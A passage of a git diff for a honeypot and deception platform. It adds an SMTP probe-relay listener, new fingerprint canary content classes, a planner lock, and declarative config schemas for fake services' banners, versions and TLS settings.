now_dt.hour)] + active = [p for p in personas if in_active_hours(p, now_dt)] if len(active) < 2: logger.debug( "emailgen pick: source=%s mail_decky=%s only %d personas in-hours", diff --git a/decnet/orchestrator/worker.py b/decnet/orchestrator/worker.py index 66da3c39..3dd9a8d4 100644 --- a/decnet/orchestrator/worker.py +++ b/decnet/orchestrator/worker.py @@ -25,6 +25,7 @@ import secrets from datetime import datetime, timezone from typing import Any, Optional +from decnet.bus import topics as _topics from decnet.bus.factory import get_bus from decnet.bus.publish import ( publish_safely, @@ -34,6 +35,7 @@ from decnet.bus.publish import ( from decnet.logging import get_logger from decnet.orchestrator import events, scheduler from decnet.orchestrator.drivers import get_driver_for +from decnet.orchestrator.drivers.smtp_relay import forward_probe from decnet.orchestrator.emailgen import ( events as email_events, scheduler as email_scheduler, @@ -138,6 +140,9 @@ async def orchestrator_worker( control_task = asyncio.create_task( run_control_listener(bus, "orchestrator", shutdown), ) + probe_task = asyncio.create_task( + _run_smtp_probe_listener(repo, shutdown), + ) tick_n = 0 try: while not shutdown.is_set(): @@ -157,7 +162,7 @@ async def orchestrator_worker( if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0: await _refresh_realism_config(repo) finally: - for t in (heartbeat_task, control_task): + for t in (heartbeat_task, control_task, probe_task): t.cancel() with contextlib.suppress(Exception, asyncio.CancelledError): await t @@ -467,6 +472,100 @@ async def _bump_synthetic_file_after_edit(repo, action, result) -> None: await repo.update_synthetic_file(action.synthetic_file_uuid, patch) +async def _run_smtp_probe_listener( + repo: BaseRepository, + shutdown: asyncio.Event, +) -> None: + """Subscribe to smtp.probe.pending and forward probe emails upstream. + + Runs as a long-lived subtask alongside the tick loop. When a probe lands + we check if this (attacker_ip, decky) has already been forwarded up to + probe_limit times — if not, forward via the master's real internet + connection and store a probe_relay bounty with the result. + """ + try: + bus = get_bus(client_name="orchestrator-probe") + await bus.connect() + sub = bus.subscribe(_topics.smtp("probe.pending")) + async with sub: + async for event in sub: + if shutdown.is_set(): + break + try: + await _handle_probe_pending(repo, event.payload) + except Exception as exc: # noqa: BLE001 + logger.warning("smtp probe listener: handle error: %s", exc) + except asyncio.CancelledError: + raise + except Exception as exc: # noqa: BLE001 + logger.warning("smtp probe listener: bus unavailable: %s", exc) + finally: + with contextlib.suppress(Exception): + await bus.close() + + +async def _handle_probe_pending(repo: BaseRepository, payload: dict) -> None: + decky_name = (payload.get("decky") or "").strip() + attacker_ip = (payload.get("attacker_ip") or "").strip() + stored_as = (payload.get("stored_as") or "").strip() + mail_from = (payload.get("mail_from") or "").strip() + rcpt_to_raw = (payload.get("rcpt_to") or "").strip() + + if not (decky_name and attacker_ip and stored_as): + return + + decky_row = await repo.get_fleet_decky_by_name(decky_name) + if not decky_row: + return + svc_cfg = ( + (decky_row.get("decky_config") or {}) + .get("service_config", {}) + .get("smtp_relay") or {} + ) + if not (svc_cfg.get("upstream_host") or "").strip(): + return + + probe_limit = int(svc_cfg.get("probe_limit") or 1) + already_sent = await repo.count_probe_relays(attacker_ip, decky_name) + if already_sent >= probe_limit: + return + + rcpt_to = [r.strip() for r in rcpt_to_raw.split(",") if r.strip()] + artifacts_root = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts") + + loop = asyncio.get_event_loop() + ok, reason = await loop.run_in_executor( + None, + lambda: forward_probe( + svc_cfg=svc_cfg, + stored_as=stored_as, + decky_name=decky_name, + mail_from=mail_from, + rcpt_to=rcpt_to, + artifacts_root=artifacts_root, + ), + ) + + await repo.add_bounty({ + "decky": decky_name, + "service": "smtp_relay", + "attacker_ip": attacker_ip, + "bounty_type": "probe_relay", + "payload": { + "stored_as": stored_as, + "forwarded": ok, + **({"fwd_error": reason} if not ok else {}), + }, + }) + if ok: + logger.info("smtp probe forwarded decky=%s ip=%s", decky_name, attacker_ip) + else: + logger.warning( + "smtp probe forward failed decky=%s ip=%s error=%s", + decky_name, attacker_ip, reason, + ) + + async def _record_synthetic_file(repo, action) -> None: """Persist (or patch) a synthetic_files row after a FileAction plant. diff --git a/decnet/realism/bodies.py b/decnet/realism/bodies.py index 415dea4d..a24fb273 100644 --- a/decnet/realism/bodies.py +++ b/decnet/realism/bodies.py @@ -25,11 +25,14 @@ from __future__ import annotations import asyncio import secrets from datetime import datetime, timezone -from typing import Callable, Optional +from typing import TYPE_CHECKING, Callable, Optional from decnet.logging import get_logger from decnet.realism.taxonomy import ContentClass +if TYPE_CHECKING: + from decnet.realism.personas import EmailPersona + log = get_logger("realism.bodies") @@ -205,6 +208,9 @@ _BODIES: dict[ContentClass, Callable[[str, secrets.SystemRandom], str]] = { ContentClass.LOG_DAEMON: _body_log_daemon, ContentClass.CACHE_TMP: _body_cache_tmp, ContentClass.EMAIL: _body_email, + # All canary classes share one placeholder — content-class discriminant is the + # "what"; the real payload (token slug, DNS hook URL) is injected by the canary + # cultivator. Do not replace with distinct generators without updating cultivator. ContentClass.CANARY_AWS_CREDS: _body_canary, ContentClass.CANARY_ENV_FILE: _body_canary, ContentClass.CANARY_GIT_CONFIG: _body_canary, @@ -213,6 +219,8 @@ _BODIES: dict[ContentClass, Callable[[str, secrets.SystemRandom], str]] = { ContentClass.CANARY_HONEYDOC_DOCX: _body_canary, ContentClass.CANARY_HONEYDOC_PDF: _body_canary, ContentClass.CANARY_MYSQL_DUMP: _body_canary, + ContentClass.CANARY_FINGERPRINT_HTML: _body_canary, + ContentClass.CANARY_FINGERPRINT_SVG: _body_canary, } @@ -240,7 +248,7 @@ def make_body( async def make_body_with_llm( content_class: ContentClass, - persona, # EmailPersona — typed loosely to avoid an import cycle + persona: "EmailPersona", *, llm=None, # LLMBackend | None breaker=None, # LLMCircuitBreaker | None diff --git a/decnet/realism/diurnal.py b/decnet/realism/diurnal.py index dc1a2080..f555234e 100644 --- a/decnet/realism/diurnal.py +++ b/decnet/realism/diurnal.py @@ -38,7 +38,7 @@ def _parse_window(window: str) -> tuple[int, int, int, int] | None: Returns ``None`` for malformed input — callers treat that as "always-on" so a single config typo never silences the whole fleet - (mirrors :func:`decnet.realism.personas.in_active_hours` semantics). + (:func:`decnet.realism.personas.in_active_hours` delegates here). """ try: start_s, end_s = window.split("-") diff --git a/decnet/realism/llm/impl/fake.py b/decnet/realism/llm/impl/fake.py index d59dba51..120bbd22 100644 --- a/decnet/realism/llm/impl/fake.py +++ b/decnet/realism/llm/impl/fake.py @@ -38,7 +38,7 @@ class FakeBackend(LLMBackend): ) self._success = success - async def generate(self, prompt: str) -> LLMResult: # noqa: ARG002 + async def generate(self, _prompt: str) -> LLMResult: t0 = time.monotonic() latency_ms = int((time.monotonic() - t0) * 1000) return LLMResult( diff --git a/decnet/realism/naming.py b/decnet/realism/naming.py index e6c9dfae..b54ead8c 100644 --- a/decnet/realism/naming.py +++ b/decnet/realism/naming.py @@ -159,6 +159,8 @@ _NAMERS: dict[ContentClass, Callable[[str, secrets.SystemRandom], str]] = { ContentClass.CANARY_HONEYDOC_DOCX: _name_canary, ContentClass.CANARY_HONEYDOC_PDF: _name_canary, ContentClass.CANARY_MYSQL_DUMP: _name_canary, + ContentClass.CANARY_FINGERPRINT_HTML: _name_canary, + ContentClass.CANARY_FINGERPRINT_SVG: _name_canary, } diff --git a/decnet/realism/personas.py b/decnet/realism/personas.py index adc43da4..ff15abcf 100644 --- a/decnet/realism/personas.py +++ b/decnet/realism/personas.py @@ -19,11 +19,13 @@ not stall the entire realism tick. from __future__ import annotations import json +from datetime import datetime from typing import Literal, Optional from pydantic import BaseModel, Field, ValidationError, field_validator, model_validator from decnet.logging import get_logger +from decnet.realism.diurnal import in_work_hours logger = get_logger("realism.personas") @@ -132,22 +134,10 @@ def login_for(persona: str) -> str: return "user" -def in_active_hours(persona: EmailPersona, now_hour: int) -> bool: - """Return True if *now_hour* (0–23) falls in the persona's window. +def in_active_hours(persona: EmailPersona, now: datetime) -> bool: + """Return True if *now* falls in the persona's active-hours window. - Format: ``"HH:MM-HH:MM"``. Wrap-around windows (``"22:00-06:00"``) - are supported. Invalid windows treat the persona as always-on so a - config typo never silences the whole fleet. + Delegates to :func:`decnet.realism.diurnal.in_work_hours` so minute + precision is preserved (``"09:30-17:45"`` is honoured correctly). """ - try: - start_s, end_s = persona.active_hours.split("-") - start_h = int(start_s.split(":")[0]) - end_h = int(end_s.split(":")[0]) - except (ValueError, IndexError): - return True - if start_h == end_h: - return True - if start_h < end_h: - return start_h <= now_hour < end_h - # Wrap-around (e.g. 22:00-06:00). - return now_hour >= start_h or now_hour < end_h + return in_work_hours(persona.active_hours, now) diff --git a/decnet/realism/personas_pool.py b/decnet/realism/personas_pool.py index 9c7a29fe..9202c730 100644 --- a/decnet/realism/personas_pool.py +++ b/decnet/realism/personas_pool.py @@ -120,11 +120,19 @@ def load(*, language_default: str = "en") -> list[EmailPersona]: logger.warning("realism global pool: read failed path=%s: %s", path, exc) return [] + # Re-stat after the read so the stored mtime reflects what we actually + # parsed — a file change between the initial stat and read would otherwise + # cache a stale mtime and suppress the next reload. + try: + st2 = path.stat() + except OSError: + st2 = st + parsed = parse_personas(raw, language_default=language_default) with _lock: _cache = parsed _cache_path = path - _cache_mtime = st.st_mtime + _cache_mtime = st2.st_mtime if parsed: logger.info( "realism global pool: loaded %d personas from %s", len(parsed), path, diff --git a/decnet/realism/planner.py b/decnet/realism/planner.py index e1a63a26..87c04429 100644 --- a/decnet/realism/planner.py +++ b/decnet/realism/planner.py @@ -20,6 +20,7 @@ persona outside its window is never considered. from __future__ import annotations import secrets +import threading from datetime import datetime from typing import Any, Optional, Sequence @@ -62,6 +63,8 @@ _DEFAULT_CANARY_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = ( (ContentClass.CANARY_HONEYDOC_DOCX, 1), (ContentClass.CANARY_HONEYDOC_PDF, 1), (ContentClass.CANARY_MYSQL_DUMP, 1), + (ContentClass.CANARY_FINGERPRINT_HTML, 1), + (ContentClass.CANARY_FINGERPRINT_SVG, 1), ) _DEFAULT_CANARY_PROBABILITY = 0.03 @@ -72,6 +75,7 @@ _USER_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = _DEFAULT_USER_CLASS_ _SYSTEM_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = _DEFAULT_SYSTEM_CLASS_WEIGHTS _CANARY_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = _DEFAULT_CANARY_CLASS_WEIGHTS _CANARY_PROBABILITY: float = _DEFAULT_CANARY_PROBABILITY +_planner_lock = threading.Lock() def _serialize_weights( @@ -82,12 +86,15 @@ def _serialize_weights( def _parse_weights( raw: Any, allowed: set[ContentClass], -) -> tuple[tuple[ContentClass, int], ...]: +) -> tuple[tuple[tuple[ContentClass, int], ...], list[str]]: """Parse ``[{"content_class": "...", "weight": N}, ...]`` into the - planner's internal tuple shape. Drops entries whose ``content_class`` - isn't in *allowed* (defends against an operator pasting in a canary - class on the user list, which would skew sampling without the - canary-probability gate). + planner's internal tuple shape. + + Returns ``(weights, dropped)`` where *dropped* is the list of + ``content_class`` values that were valid enum members but not in + *allowed* (e.g. a canary class pasted onto the user list). Callers + surface *dropped* in the API response so the operator can see the + entry didn't land without having to re-read the config. Raises ``ValueError`` on structural problems (non-list, non-int weight, negative weight, empty result) so the API can return 400. @@ -95,6 +102,7 @@ def _parse_weights( if not isinstance(raw, list): raise ValueError("weights must be a list") out: list[tuple[ContentClass, int]] = [] + dropped: list[str] = [] for entry in raw: if not isinstance(entry, dict): raise ValueError("each weight entry must be an object") @@ -111,18 +119,14 @@ def _parse_weights( except (ValueError, TypeError): raise ValueError(f"unknown content_class: {cls_name!r}") if cls not in allowed: - # Silently drop — a class that doesn't belong on this list - # (e.g. a canary class on the user list) is operator error, - # but we don't want to fail the whole save over one stray - # entry. The roundtrip in current_payload() will show the - # operator their entry didn't land. + dropped.append(cls.value) continue out.append((cls, weight)) if not out: raise ValueError("weights list resolved to zero valid entries") if sum(w for _, w in out) <= 0: raise ValueError("weights must sum to a positive number") - return tuple(out) + return tuple(out), dropped _USER_CLASSES: set[ContentClass] = { @@ -136,6 +140,7 @@ _CANARY_CLASSES: set[ContentClass] = { ContentClass.CANARY_GIT_CONFIG, ContentClass.CANARY_SSH_KEY, ContentClass.CANARY_HONEYDOC, ContentClass.CANARY_HONEYDOC_DOCX, ContentClass.CANARY_HONEYDOC_PDF, ContentClass.CANARY_MYSQL_DUMP, + ContentClass.CANARY_FINGERPRINT_HTML, ContentClass.CANARY_FINGERPRINT_SVG, } @@ -151,15 +156,21 @@ def current_payload() -> dict[str, Any]: } -def apply_payload(payload: dict[str, Any]) -> None: +def apply_payload(payload: dict[str, Any]) -> list[str]: """Override the planner's live globals from a wire payload. Validates structurally and rebinds module-level names atomically per field — partial failures don't leave the planner in a torn state because validation happens before any rebind. + Returns the list of ``content_class`` values that were dropped + because they didn't belong on their target list (e.g. a canary + class on the user list). Callers should surface this in the API + response so operators know their entry didn't land. + Unknown fields are ignored (forward-compat); fields not present - leave the corresponding global untouched.""" + leave the corresponding global untouched. + """ global _USER_CLASS_WEIGHTS, _SYSTEM_CLASS_WEIGHTS global _CANARY_CLASS_WEIGHTS, _CANARY_PROBABILITY @@ -167,37 +178,45 @@ def apply_payload(payload: dict[str, Any]) -> None: new_system = _SYSTEM_CLASS_WEIGHTS new_canary = _CANARY_CLASS_WEIGHTS new_prob = _CANARY_PROBABILITY + all_dropped: list[str] = [] if "user_class_weights" in payload: - new_user = _parse_weights(payload["user_class_weights"], _USER_CLASSES) + new_user, dropped = _parse_weights(payload["user_class_weights"], _USER_CLASSES) + all_dropped.extend(dropped) if "system_class_weights" in payload: - new_system = _parse_weights( + new_system, dropped = _parse_weights( payload["system_class_weights"], _SYSTEM_CLASSES, ) + all_dropped.extend(dropped) if "canary_class_weights" in payload: - new_canary = _parse_weights( + new_canary, dropped = _parse_weights( payload["canary_class_weights"], _CANARY_CLASSES, ) + all_dropped.extend(dropped) if "canary_probability" in payload: prob = payload["canary_probability"] if not isinstance(prob, (int, float)) or not (0.0 <= prob <= 1.0): raise ValueError("canary_probability must be in [0.0, 1.0]") new_prob = float(prob) - _USER_CLASS_WEIGHTS = new_user - _SYSTEM_CLASS_WEIGHTS = new_system - _CANARY_CLASS_WEIGHTS = new_canary - _CANARY_PROBABILITY = new_prob + with _planner_lock: + _USER_CLASS_WEIGHTS = new_user + _SYSTEM_CLASS_WEIGHTS = new_system + _CANARY_CLASS_WEIGHTS = new_canary + _CANARY_PROBABILITY = new_prob + + return all_dropped def reset_to_defaults() -> None: """Restore hardcoded defaults. Used by tests and the API reset path.""" global _USER_CLASS_WEIGHTS, _SYSTEM_CLASS_WEIGHTS global _CANARY_CLASS_WEIGHTS, _CANARY_PROBABILITY - _USER_CLASS_WEIGHTS = _DEFAULT_USER_CLASS_WEIGHTS - _SYSTEM_CLASS_WEIGHTS = _DEFAULT_SYSTEM_CLASS_WEIGHTS - _CANARY_CLASS_WEIGHTS = _DEFAULT_CANARY_CLASS_WEIGHTS - _CANARY_PROBABILITY = _DEFAULT_CANARY_PROBABILITY + with _planner_lock: + _USER_CLASS_WEIGHTS = _DEFAULT_USER_CLASS_WEIGHTS + _SYSTEM_CLASS_WEIGHTS = _DEFAULT_SYSTEM_CLASS_WEIGHTS + _CANARY_CLASS_WEIGHTS = _DEFAULT_CANARY_CLASS_WEIGHTS + _CANARY_PROBABILITY = _DEFAULT_CANARY_PROBABILITY def _weighted_pick( diff --git a/decnet/realism/taxonomy.py b/decnet/realism/taxonomy.py index 703e4ae0..4ed51612 100644 --- a/decnet/realism/taxonomy.py +++ b/decnet/realism/taxonomy.py @@ -62,6 +62,8 @@ class ContentClass(StrEnum): CANARY_HONEYDOC_DOCX = "canary_honeydoc_docx" CANARY_HONEYDOC_PDF = "canary_honeydoc_pdf" CANARY_MYSQL_DUMP = "canary_mysql_dump" + CANARY_FINGERPRINT_HTML = "canary_fingerprint_html" + CANARY_FINGERPRINT_SVG = "canary_fingerprint_svg" def is_canary(self) -> bool: return self.value.startswith("canary_") diff --git a/decnet/services/base.py b/decnet/services/base.py index 2f7936f0..942813d2 100644 --- a/decnet/services/base.py +++ b/decnet/services/base.py @@ -1,5 +1,47 @@ +import base64 +import binascii from abc import ABC, abstractmethod +from dataclasses import asdict, dataclass from pathlib import Path +from typing import Any, Literal + +# Sentinel prefix used by the deploy wizard to ship multi-line textarea values +# through ConfigParser without relying on its multi-line continuation syntax. +# Plain raw values without the prefix are accepted as-is so direct API +# submitters (PUT /…/services/{svc}/config) keep working with raw strings. +TEXTAREA_B64_PREFIX = "b64:" + +FieldType = Literal["string", "password", "int", "bool", "textarea", "enum"] + + +@dataclass(frozen=True) +class ServiceConfigField: + """ + Declarative descriptor for one user-editable knob on a service. + + The Inspector form (Fleet + MazeNET) renders inputs from this metadata, + and BaseService.validate_cfg coerces submitted values against it. + """ + + key: str + label: str + type: FieldType = "string" + default: Any = None + secret: bool = False + help: str | None = None + enum: list[str] | None = None + placeholder: str | None = None + + def to_json(self) -> dict: + d = asdict(self) + # Frontend doesn't need a None enum dangling on non-enum fields + if self.enum is None: + d.pop("enum", None) + return d + + +class ConfigValidationError(ValueError): + """Raised when a submitted service_cfg value cannot be coerced to its declared type.""" class BaseService(ABC): @@ -15,6 +57,10 @@ class BaseService(ABC): default_image: str # Docker image tag, or "build" if a Dockerfile is needed fleet_singleton: bool = False # True = runs once fleet-wide, not per-decky + # Per-service customizable fields exposed to the Inspector UI. + # Subclasses override; default empty -> "No customizable fields". + config_schema: list[ServiceConfigField] = [] + @abstractmethod def compose_fragment( self, @@ -41,3 +87,63 @@ class BaseService(ABC): image built. Return None if default_image is used directly. """ return None + + def validate_cfg(self, cfg: dict | None) -> dict: + """ + Coerce a user-submitted dict against this service's config_schema. + + Unknown keys are silently dropped. Declared keys are coerced to their + declared type (raising ConfigValidationError on bad values). Empty + strings on optional fields drop the key entirely so compose_fragment's + existing `if "X" in cfg` guards keep working. + """ + out: dict[str, Any] = {} + if not cfg: + return out + by_key = {f.key: f for f in self.config_schema} + for key, raw in cfg.items(): + spec = by_key.get(key) + if spec is None: + continue # drop unknown keys + if raw is None or raw == "": + continue + out[key] = _coerce(spec, raw) + return out + + +def _coerce(spec: ServiceConfigField, raw: Any) -> Any: + t = spec.type + if t in ("string", "password"): + return str(raw) + if t == "textarea": + s = str(raw) + if s.startswith(TEXTAREA_B64_PREFIX): + try: + return base64.b64decode(s[len(TEXTAREA_B64_PREFIX):], validate=True).decode("utf-8") + except (binascii.Error, UnicodeDecodeError) as e: + raise ConfigValidationError( + f"{spec.key}: malformed {TEXTAREA_B64_PREFIX} payload" + ) from e + return s + if t == "int": + try: + return int(raw) + except (TypeError, ValueError) as e: + raise ConfigValidationError(f"{spec.key}: expected int, got {raw!r}") from e + if t == "bool": + if isinstance(raw, bool): + return raw + if isinstance(raw, str): + if raw.lower() in ("true", "1", "yes", "on"): + return True + if raw.lower() in ("false", "0", "no", "off"): + return False + raise ConfigValidationError(f"{spec.key}: expected bool, got {raw!r}") + if t == "enum": + s = str(raw) + if spec.enum and s not in spec.enum: + raise ConfigValidationError( + f"{spec.key}: {s!r} not in allowed values {spec.enum}" + ) + return s + raise ConfigValidationError(f"{spec.key}: unknown field type {t!r}") diff --git a/decnet/services/conpot.py b/decnet/services/conpot.py index 5eacff6a..a4750483 100644 --- a/decnet/services/conpot.py +++ b/decnet/services/conpot.py @@ -12,6 +12,7 @@ class ConpotService(BaseService): name = "conpot" ports = [502, 161, 80] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: env = { diff --git a/decnet/services/docker_api.py b/decnet/services/docker_api.py index d4db39c4..e58c8e34 100644 --- a/decnet/services/docker_api.py +++ b/decnet/services/docker_api.py @@ -8,6 +8,7 @@ class DockerAPIService(BaseService): name = "docker_api" ports = [2375, 2376] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/elasticsearch.py b/decnet/services/elasticsearch.py index d4bb65c2..b08c9a0d 100644 --- a/decnet/services/elasticsearch.py +++ b/decnet/services/elasticsearch.py @@ -9,6 +9,7 @@ class ElasticsearchService(BaseService): name = "elasticsearch" ports = [9200] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/ftp.py b/decnet/services/ftp.py index 0a1cafe3..d9059aac 100644 --- a/decnet/services/ftp.py +++ b/decnet/services/ftp.py @@ -8,6 +8,7 @@ class FTPService(BaseService): name = "ftp" ports = [21] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/http.py b/decnet/services/http.py index 56928def..7639ed42 100644 --- a/decnet/services/http.py +++ b/decnet/services/http.py @@ -1,6 +1,6 @@ import json from pathlib import Path -from decnet.services.base import BaseService +from decnet.services.base import BaseService, ServiceConfigField TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "http" @@ -10,6 +10,41 @@ class HTTPService(BaseService): ports = [80, 443] default_image = "build" + config_schema = [ + ServiceConfigField( + key="server_header", + label="Server header", + type="string", + placeholder="Apache/2.4.41 (Ubuntu)", + help="Value sent in the HTTP Server: response header.", + ), + ServiceConfigField( + key="response_code", + label="Default response code", + type="int", + default=200, + ), + ServiceConfigField( + key="fake_app", + label="Fake application", + type="enum", + enum=["none", "wordpress", "phpmyadmin", "tomcat", "jenkins"], + default="none", + help="Pre-baked application skin to render on the index page.", + ), + ServiceConfigField( + key="extra_headers", + label="Extra headers (JSON or raw)", + type="textarea", + placeholder='{"X-Powered-By": "PHP/7.4.3"}', + ), + ServiceConfigField( + key="custom_body", + label="Custom response body", + type="textarea", + ), + ] + def compose_fragment( self, decky_name: str, diff --git a/decnet/services/https.py b/decnet/services/https.py index 3c6735a9..8faefbb4 100644 --- a/decnet/services/https.py +++ b/decnet/services/https.py @@ -1,6 +1,6 @@ import json from pathlib import Path -from decnet.services.base import BaseService +from decnet.services.base import BaseService, ServiceConfigField TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "https" @@ -10,6 +10,57 @@ class HTTPSService(BaseService): ports = [443] default_image = "build" + config_schema = [ + ServiceConfigField( + key="server_header", + label="Server header", + type="string", + placeholder="nginx/1.18.0", + ), + ServiceConfigField( + key="response_code", + label="Default response code", + type="int", + default=200, + ), + ServiceConfigField( + key="fake_app", + label="Fake application", + type="enum", + enum=["none", "wordpress", "phpmyadmin", "tomcat", "jenkins"], + default="none", + ), + ServiceConfigField( + key="extra_headers", + label="Extra headers (JSON or raw)", + type="textarea", + ), + ServiceConfigField( + key="custom_body", + label="Custom response body", + type="textarea", + ), + ServiceConfigField( + key="tls_cn", + label="TLS certificate CN", + type="string", + placeholder="mail.corp.local", + help="Common Name baked into the self-signed cert if no cert/key provided.", + ), + ServiceConfigField( + key="tls_cert", + label="TLS certificate (PEM)", + type="textarea", + secret=True, + ), + ServiceConfigField( + key="tls_key", + label="TLS private key (PEM)", + type="textarea", + secret=True, + ), + ] + def compose_fragment( self, decky_name: str, diff --git a/decnet/services/imap.py b/decnet/services/imap.py index 902f57cf..86de699d 100644 --- a/decnet/services/imap.py +++ b/decnet/services/imap.py @@ -8,6 +8,7 @@ class IMAPService(BaseService): name = "imap" ports = [143, 993] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/k8s.py b/decnet/services/k8s.py index 32cc56db..47e988fc 100644 --- a/decnet/services/k8s.py +++ b/decnet/services/k8s.py @@ -8,6 +8,7 @@ class KubernetesAPIService(BaseService): name = "k8s" ports = [6443, 8080] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/ldap.py b/decnet/services/ldap.py index 76eaa2d0..6d7337b7 100644 --- a/decnet/services/ldap.py +++ b/decnet/services/ldap.py @@ -8,6 +8,7 @@ class LDAPService(BaseService): name = "ldap" ports = [389, 636] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/llmnr.py b/decnet/services/llmnr.py index 43197376..9e4a7b0e 100644 --- a/decnet/services/llmnr.py +++ b/decnet/services/llmnr.py @@ -15,6 +15,7 @@ class LLMNRService(BaseService): name = "llmnr" ports = [5355, 5353] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/mongodb.py b/decnet/services/mongodb.py index 397faaf3..050d10b0 100644 --- a/decnet/services/mongodb.py +++ b/decnet/services/mongodb.py @@ -8,6 +8,7 @@ class MongoDBService(BaseService): name = "mongodb" ports = [27017] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/mqtt.py b/decnet/services/mqtt.py index 60d134f5..b2260b71 100644 --- a/decnet/services/mqtt.py +++ b/decnet/services/mqtt.py @@ -8,6 +8,7 @@ class MQTTService(BaseService): name = "mqtt" ports = [1883] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/mssql.py b/decnet/services/mssql.py index 46b262dc..4b8528e3 100644 --- a/decnet/services/mssql.py +++ b/decnet/services/mssql.py @@ -8,6 +8,7 @@ class MSSQLService(BaseService): name = "mssql" ports = [1433] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/mysql.py b/decnet/services/mysql.py index deb5b502..639a2d08 100644 --- a/decnet/services/mysql.py +++ b/decnet/services/mysql.py @@ -1,5 +1,5 @@ from pathlib import Path -from decnet.services.base import BaseService +from decnet.services.base import BaseService, ServiceConfigField TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "mysql" @@ -9,6 +9,16 @@ class MySQLService(BaseService): ports = [3306] default_image = "build" + config_schema = [ + ServiceConfigField( + key="version", + label="Advertised MySQL version", + type="string", + placeholder="8.0.36", + help="Sets the version banner the fake MySQL handshake reports.", + ), + ] + def compose_fragment( self, decky_name: str, diff --git a/decnet/services/pop3.py b/decnet/services/pop3.py index 58e33ad1..6fd57a38 100644 --- a/decnet/services/pop3.py +++ b/decnet/services/pop3.py @@ -8,6 +8,7 @@ class POP3Service(BaseService): name = "pop3" ports = [110, 995] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/postgres.py b/decnet/services/postgres.py index 8a75ded0..62bf83df 100644 --- a/decnet/services/postgres.py +++ b/decnet/services/postgres.py @@ -8,6 +8,7 @@ class PostgresService(BaseService): name = "postgres" ports = [5432] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/rdp.py b/decnet/services/rdp.py index ccdced01..c3c45ce2 100644 --- a/decnet/services/rdp.py +++ b/decnet/services/rdp.py @@ -1,5 +1,5 @@ from pathlib import Path -from decnet.services.base import BaseService +from decnet.services.base import BaseService, ServiceConfigField TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "rdp" @@ -9,6 +9,19 @@ class RDPService(BaseService): ports = [3389] default_image = "build" + config_schema = [ + ServiceConfigField( + key="nla", + label="Enable CredSSP / NLA", + type="bool", + default=False, + help=( + "Off by default — basic X.224 cookie capture is enough for most " + "attacker traffic and avoids the openssl cert-gen at container start." + ), + ), + ] + def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { "build": {"context": str(TEMPLATES_DIR)}, diff --git a/decnet/services/redis.py b/decnet/services/redis.py index b6c9b5c9..36ddec76 100644 --- a/decnet/services/redis.py +++ b/decnet/services/redis.py @@ -1,5 +1,5 @@ from pathlib import Path -from decnet.services.base import BaseService +from decnet.services.base import BaseService, ServiceConfigField TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "redis" @@ -9,6 +9,23 @@ class RedisService(BaseService): ports = [6379] default_image = "build" + config_schema = [ + ServiceConfigField( + key="version", + label="Advertised Redis version", + type="string", + placeholder="7.2.4", + help="Reported by INFO server -> redis_version.", + ), + ServiceConfigField( + key="os_string", + label="Advertised OS string", + type="string", + placeholder="Linux 5.15.0 x86_64", + help="Reported by INFO server -> os.", + ), + ] + def compose_fragment( self, decky_name: str, diff --git a/decnet/services/registry.py b/decnet/services/registry.py index 297335fd..f2c08623 100644 --- a/decnet/services/registry.py +++ b/decnet/services/registry.py 